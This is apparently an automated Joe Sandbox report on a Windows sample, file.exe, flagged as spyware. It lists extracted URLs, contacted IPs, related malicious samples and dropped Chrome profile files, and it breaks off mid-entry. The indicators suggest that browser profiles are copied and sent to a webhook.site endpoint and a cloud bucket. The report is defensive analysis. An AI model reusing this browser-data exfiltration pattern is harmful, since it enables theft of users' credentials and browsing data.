        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/document/installwebapp?usp=chrome_defaultfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://chrome.google.com/webstore?hl=enfile.exe, 00000000.00000002.1442531637.00000000024DE000.00000004.00001000.00020000.00000000.sdmp, Top Sites.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://sandbox.google.com/payments/v4/js/integrator.jsfile.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/presentation/:file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/presentation/installwebapp?usp=chrome_defaultfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/document/:file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://chrome.google.com/webstore?hl=enWebTop Sites.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/spreadsheets/Jfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.google.comNetwork Persistent State.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/spreadsheets/?usp=installed_webappfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://mail.google.com/mail/Jfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://chrome.google.comNetwork Persistent State.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drfalse
        • URL Reputation: safe
        		unknown
        https://docs.google.com/spreadsheets/:file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://drive.google.com/?lfhs=2file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.youtube.com/s/notifications/manifest/cr_install.htmlfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.youtube.com/?feature=ytcafile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.youtube.com/Jfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://drive.google.com/:file.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://payments.google.com/payments/v4/js/integrator.jsfile.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://drive.google.com/Jfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.ecosia.org/newtab/file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drfalse
        • URL Reputation: safe
        		unknown
        https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8Cfile.exe, 00000000.00000002.1442531637.0000000002314000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.000000000236A000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drfalse
        • URL Reputation: safe
        		unknown
        http://s3.amazonaws.com/doc/2006-03-01/https://s3.ap-southeast-1.wasabisys.com/browser-profiles/2024file.exe, 00000000.00000002.1442531637.00000000024D8000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.00000000023A2000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://csp.withgoogle.com/csp/report-to/chromewebstoreReporting and NEL.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/presentation/?usp=installed_webappfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5Tempfile.exe, 00000000.00000002.1442531637.00000000024F6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5https://webhook.site/efe6628a-60cc-4d7a-bd0file.exe, 00000000.00000002.1442531637.00000000024D8000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://s3.amazonaws.com/doc/2006-03-01/Createdfile.exe, 00000000.00000002.1442531637.00000000024A8000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://clients2.googleusercontent.comNetwork Persistent State.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/document/?usp=installed_webappfile.exe, 00000000.00000002.1442531637.00000000023CD000.00000004.00001000.00020000.00000000.sdmp, 000003.log.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000002.1442531637.0000000002560000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1442531637.0000000002438000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.drfalse
        • URL Reputation: safe
        		unknown
        https://csp.withgoogle.com/csp/report-to/gws/noneReporting and NEL.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.google.com/file.exe, 00000000.00000002.1442531637.00000000023A6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        178.63.67.153
        		unknownGermany
        		24940HETZNER-ASDEfalse
        46.4.105.116
        		webhook.siteGermany
        		24940HETZNER-ASDEfalse
        154.18.200.102
        		ap-southeast-1.wasabisys.comUnited States
        		38701PIRANHA-AS-KRPiranhaSystemsKRfalse

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1497447
        Start date and time:2024-08-22 15:38:32 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 43s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:11
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:file.exe
        Detection:MAL
        Classification:mal48.spyw.winEXE@1/84@3/3
        EGA Information:Failed
        HCA Information:Failed
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, UsoClient.exe
        • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target file.exe, PID 7564 because there are no executed function
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • VT rate limit hit for: file.exe

        Simulations

        Behavior and APIs

        TimeTypeDescription
        09:39:32API Interceptor1x Sleep call for process: file.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        46.4.105.116file.exeGet hashmaliciousUnknownBrowse
          4Vp6Xc8SFr.exeGet hashmaliciousUnknownBrowse

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            webhook.sitefile.exeGet hashmaliciousUnknownBrowse
            • 178.63.67.106
            4Vp6Xc8SFr.exeGet hashmaliciousUnknownBrowse
            • 46.4.105.116

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            HETZNER-ASDEfile.exeGet hashmaliciousVidarBrowse
            • 116.203.10.69
            https://email.kmotortraiesde.com/Get hashmaliciousUnknownBrowse
            • 135.181.16.82
            hesaphareketi__20240822.exeGet hashmaliciousUnknownBrowse
            • 116.203.186.178
            hesaphareketi__20240822.exeGet hashmaliciousUnknownBrowse
            • 116.203.186.178
            Request for Quotation + sample catalog.vbsGet hashmaliciousFormBookBrowse
            • 178.63.50.103
            d8EEfAi7tl.vbsGet hashmaliciousMoDiRATBrowse
            • 195.201.57.90
            ACCEPT_014STSY529093.PDF.vbsGet hashmaliciousUnknownBrowse
            • 135.181.213.52
            https://www.miaspesa.it/change-zipcode?zc=reset&ret_url=https://www.volunteermatters.net/cas/logout?service=https://elicitsolutions.co.ke/ssh/index.htmlGet hashmaliciousUnknownBrowse
            • 148.251.133.229
            sora.arm.elfGet hashmaliciousUnknownBrowse
            • 91.107.240.236
            http://www.goo.su/JpY9S/Get hashmaliciousUnknownBrowse
            • 195.201.198.232
            PIRANHA-AS-KRPiranhaSystemsKRfile.exeGet hashmaliciousUnknownBrowse
            • 154.18.200.103
            154.216.17.9-skid.m68k-2024-08-04T06_23_08.elfGet hashmaliciousMirai, MoobotBrowse
            • 101.250.29.148
            AAMwAy8pB7.elfGet hashmaliciousMirai, MoobotBrowse
            • 14.206.54.211
            RDEHNTKF1V.elfGet hashmaliciousMirai, MoobotBrowse
            • 182.163.212.248
            ysEZTOz202.elfGet hashmaliciousMiraiBrowse
            • 112.213.7.31
            dZcVvCQn9I.elfGet hashmaliciousMiraiBrowse
            • 101.250.29.141
            YnO77q8WhV.elfGet hashmaliciousUnknownBrowse
            • 154.18.217.41
            xDqMW4J6W3.elfGet hashmaliciousUnknownBrowse
            • 122.49.121.182
            57O67GbOCj.elfGet hashmaliciousMiraiBrowse
            • 112.213.7.51
            SoqyJuUVvW.elfGet hashmaliciousMiraiBrowse
            • 114.141.240.236
            HETZNER-ASDEfile.exeGet hashmaliciousVidarBrowse
            • 116.203.10.69
            https://email.kmotortraiesde.com/Get hashmaliciousUnknownBrowse
            • 135.181.16.82
            hesaphareketi__20240822.exeGet hashmaliciousUnknownBrowse
            • 116.203.186.178
            hesaphareketi__20240822.exeGet hashmaliciousUnknownBrowse
            • 116.203.186.178
            Request for Quotation + sample catalog.vbsGet hashmaliciousFormBookBrowse
            • 178.63.50.103
            d8EEfAi7tl.vbsGet hashmaliciousMoDiRATBrowse
            • 195.201.57.90
            ACCEPT_014STSY529093.PDF.vbsGet hashmaliciousUnknownBrowse
            • 135.181.213.52
            https://www.miaspesa.it/change-zipcode?zc=reset&ret_url=https://www.volunteermatters.net/cas/logout?service=https://elicitsolutions.co.ke/ssh/index.htmlGet hashmaliciousUnknownBrowse
            • 148.251.133.229
            sora.arm.elfGet hashmaliciousUnknownBrowse
            • 91.107.240.236
            http://www.goo.su/JpY9S/Get hashmaliciousUnknownBrowse
            • 195.201.198.232

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Affiliation Database

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 5
            Category:dropped
            Size (bytes):45056
            Entropy (8bit):0.40014189446483467
            Encrypted:false
            SSDEEP:24:TLz3blvGgOg53yS0lNvN2HLvKroyr0n4BmhltoVOq6Uwcc05fBGQwQ:TNxiSdLS0aVOlU1coB
            MD5:00AF4A50B4E83413600C40BE126B17B1
            SHA1:D6C2AAC58F581C4EA3B45C997A922DD99B2396CD
            SHA-256:95A77058925FC8DC392E2A4CF51D60EE41FFA49967A6E3BD4F34EFE3F0473E0E
            SHA-512:8B95EE2EFCA34EFE82A7E53E3C9EF68B481F174A5545C6A0AF9BB104AB43EF9554E2FB439522D4308886A8B04C9BC912472E82AF1E0964A5CA89906F0C646A02
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:SQLite format 3......@ ..........................................................................j..........g.....e...$.y.....Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BrowsingTopicsSiteData

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):28672
            Entropy (8bit):0.43798896343124133
            Encrypted:false
            SSDEEP:12:TLiqiQ5xT5SmKT5Si8wT5SislpXUUfzBW8ybwaW2b8wAs76uvsUkHZ6HFxOUwa52:TLiK5byqkiXBzlRr6hkc6UwccI5fBG
            MD5:7DCE97F609ECB4E2FA1F10D6594B362D
            SHA1:D78E2B7CFD27CEEBA4232752198D0561187E996A
            SHA-256:DBB0DAFF05CC9D3E3D524CE2C13913A0C7A193EF0A81254731DEF5623D2A8A31
            SHA-512:93B09E49BC25E7671471DA4002325F2EAB900B07C66F4CA142EA7A0A34009F6ACBB7C089EAE5056EAA5700F3E474205096D03DA14F4A8E3F1233647573212FAF
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:SQLite format 3......@ ..........................................................................j..........g.......o..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BrowsingTopicsState

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):414
            Entropy (8bit):5.062860331602711
            Encrypted:false
            SSDEEP:12:1HAgdRN6m5V+zW1+F6sKaxVRpghEkEIcN8zUujN6v:1H/Nv+y1BxaxVRpghEFIcN8j2
            MD5:97D0408A14EAC6028DE0776DDA8EEDDE
            SHA1:5AD8D77FB52F9BAAAF763D4A8AB43391F2D227F7
            SHA-256:D99D88143560FDDE72F0B9C69C07A4F3B66D8BF81D5E34BC814CDED7B377AC9E
            SHA-512:89143BA3BD26D13BCA56B61B87304707FB0DD5D0A3B6A45845708CC7F8F3AA0F3F220C2E35C1C451DD684D442A338D597E704E25DD5D226DCBBE0B47F1D91783
            Malicious:false
            Reputation:low
            Preview:{.. "epochs": [ {.. "calculation_time": "13340965313745074",.. "config_version": 0,.. "model_version": "0",.. "padded_top_topics_start_index": 0,.. "taxonomy_version": 0,.. "top_topics_and_observing_domains": [ ].. } ],.. "hex_encoded_hmac_key": "CD07BB1567FC202F2EFB1E5BB273023EC8EEF9A1400AF8A7E9DF17EF86D32C19",.. "next_scheduled_calculation_time": "13341570113745131"..}..

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\DIPS

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):28672
            Entropy (8bit):0.43508159006069336
            Encrypted:false
            SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
            MD5:F5237AED0F897E7619A94843845A3EC3
            SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
            SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
            SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Cookies

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):20480
            Entropy (8bit):0.5712781801655107
            Encrypted:false
            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
            MD5:05A60B4620923FD5D53B9204391452AF
            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\000003.log

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):152
            Entropy (8bit):1.8784775129881184
            Encrypted:false
            SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCT
            MD5:5649E96DCAC327DDE1B450B1C06A27D3
            SHA1:7AA5F9FB94F95F5977AE9BFA7A4957724FD66F19
            SHA-256:FBCBAF8740CB027FF6A147C013B6745071CF2A1FDE4450AB2A7A04FBC401F0C9
            SHA-512:0BF8D7E6582330D8C362C85EE0688F2A38D3768ECD6DDB9277EFFAA718B2B6C7FD82F665CECCEFD164C2921FE4EB30C43DFB7A3AB3A8FA4496E5B8F3F8DF10C3
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\CURRENT

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):16
            Entropy (8bit):3.2743974703476995
            Encrypted:false
            SSDEEP:3:1sjgWIV//Uv:1qIFUv
            MD5:46295CAC801E5D4857D09837238A6394
            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
            Malicious:false
            Preview:MANIFEST-000001.

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\LOG

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):328
            Entropy (8bit):5.2096265739201755
            Encrypted:false
            SSDEEP:6:kubekL+q2PcNwi23iKKdK8aPrqIFUtjbeyKWZmwxbekLVkwOcNwi23iKKdK8amLJ:kubj+vLZ5KkL3FUtjb5KW/xbjV54Z5KV
            MD5:236591A25BC59248EA36B890069A49CE
            SHA1:F12787028A40F10251BFE4E43FBDF8E49A837694
            SHA-256:E5A746BE1DB58975FD9386FA12A63A212F93C499B82700A3FD5F2B950964E0BC
            SHA-512:176F01BE99766A185A86796F9984E1A84529B95FCA465A23C13A19FE1BAE225ACF10B09ECBFBDFCFD575BEA4F9333E6B4152992237756DCC2F07BA14D0C25F16
            Malicious:false
            Preview:2023/10/05-08:42:23.686 25ec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2023/10/05-08:42:23.686 25ec Recovering log #3.2023/10/05-08:42:23.686 25ec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\LOG.old

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):328
            Entropy (8bit):5.229793329677182
            Encrypted:false
            SSDEEP:6:kuWgq2PcNwi23iKKdK8aPrqIFUtjWBZmwxWbkwOcNwi23iKKdK8amLJ:kuhvLZ5KkL3FUtjc/xc54Z5KkQJ
            MD5:79D500A5677A8743FA890FFF62A98A7D
            SHA1:FA56DADB710D320DD730B48E749AF7AB22DBF08E
            SHA-256:6CA5FE0113C6073086A3655CFD78E0DD7910A96E852D8D8CB962E8BAD453FD01
            SHA-512:F7E9CB728988BA9E9EBDFF8D4D05CA6D7DEB9776951AA680646C20FA6582F9421F1530E40962F6BFA752C89BA82B2A178774381E0F054B53D637C644B9B0D31E
            Malicious:false
            Preview:2023/10/05-08:41:58.660 1db0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2023/10/05-08:41:58.660 1db0 Recovering log #3.2023/10/05-08:41:58.660 1db0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\MANIFEST-000001

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:OpenPGP Secret Key
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.704993772857998
            Encrypted:false
            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
            Malicious:false
            Preview:.|.."....leveldb.BytewiseComparator......

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\000003.log

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):152
            Entropy (8bit):1.8784775129881184
            Encrypted:false
            SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCT
            MD5:5649E96DCAC327DDE1B450B1C06A27D3
            SHA1:7AA5F9FB94F95F5977AE9BFA7A4957724FD66F19
            SHA-256:FBCBAF8740CB027FF6A147C013B6745071CF2A1FDE4450AB2A7A04FBC401F0C9
            SHA-512:0BF8D7E6582330D8C362C85EE0688F2A38D3768ECD6DDB9277EFFAA718B2B6C7FD82F665CECCEFD164C2921FE4EB30C43DFB7A3AB3A8FA4496E5B8F3F8DF10C3
            Malicious:false
            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\CURRENT

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):16
            Entropy (8bit):3.2743974703476995
            Encrypted:false
            SSDEEP:3:1sjgWIV//Uv:1qIFUv
            MD5:46295CAC801E5D4857D09837238A6394
            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
            Malicious:false
            Preview:MANIFEST-000001.

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\LOG

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):332
            Entropy (8bit):5.238579061162395
            Encrypted:false
            SSDEEP:6:kubeKL+q2PcNwi23iKKdK865IFUtjbeB1KWZmwxbeBjLVkwOcNwi23iKKdK86+Ud:kub1+vLZ5Kk/WFUtjboKW/xbiV54Z5Ky
            MD5:85D53699C673C895FCECE879652E88FD
            SHA1:3DF2521346C27AE115E7BF5DEC9591E09F8065AF
            SHA-256:A2B8DAB56D03C56EFC60142E893F186F043F155FED9087B43FE11828F4BEA05D
            SHA-512:2343A48DADA4192A81DF35E13A84B12F94A4B3ED11F9DD6081F66DF0711D44CB731EF864F9D759D04C13C9BDC16A7197B78A2455477B512B5631C1BFAA55839D
            Malicious:false
            Preview:2023/10/05-08:42:23.688 25ec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts/MANIFEST-000001.2023/10/05-08:42:23.689 25ec Recovering log #3.2023/10/05-08:42:23.689 25ec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\LOG.old

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):332
            Entropy (8bit):5.2620164020775375
            Encrypted:false
            SSDEEP:6:ku6Uaq2PcNwi23iKKdK865IFUtj6UTZmwxUTFkwOcNwi23iKKdK86+ULJ:ku6UavLZ5Kk/WFUtj6UT/xy54Z5Kk/+e
            MD5:E45197354DDBA2CED627825EA4FE6146
            SHA1:7A55DDB2255221BA04F44DA038FC7A48988DBCD9
            SHA-256:300BE503B2B5F027C7B2C53B92120BCD2B0656FA77CFD8758529578505CD12B0
            SHA-512:06188EC45F8C772B1C48C83F31724B934A369B2F57E5376A0DE8F44951CD42D05A2B2A56DBF58722EBACDB7FEA11BB4A1AB37F8C9A8EA25E36B252479A43E506
            Malicious:false
            Preview:2023/10/05-08:41:58.661 1db0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts/MANIFEST-000001.2023/10/05-08:41:58.661 1db0 Recovering log #3.2023/10/05-08:41:58.662 1db0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\MANIFEST-000001

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:OpenPGP Secret Key
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.704993772857998
            Encrypted:false
            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
